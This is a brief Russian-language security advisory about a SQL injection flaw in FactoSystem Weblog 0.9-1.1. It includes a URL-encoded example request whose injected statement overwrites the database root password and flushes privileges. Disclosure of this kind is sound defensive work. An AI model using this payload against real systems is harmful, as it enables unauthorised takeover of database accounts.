FactoSystem Weblog - бесплатный пакет программ для обработки журналов регистрации Web серверов.
FactoSystem не фильтрует специальные символы. Атакующий может представить запрос, содержащий специальные символы, и выполнять произвольные команды с привилегиями пользователя базы данных.
Пример (убирайте пробелы):
http://www.example.com/author.asp ?authornumber=1%28%20And%20
AuthorTable%2EAuthorID %3DBlurbTable%2EAuthorID%20And%20 BlurbTable%2ESub_id
%3DSubjectTable%2ESub_id%20Order%20By
%20BlurbTable%2EBlurbdate%20desc%2C%20blurbtable%2Eblurbtime
%20desc%3BUPDATE%20user%20SET%20Password% 3DPASSWORD%28%27password%27%29%20WHERE
%20user%3D%27root%27%3B%20FLUSH %20PRIVILEGES%3B--
Уязвимость обнаружена в FactoSystem FactoSystem Weblog 0.9-1.1.
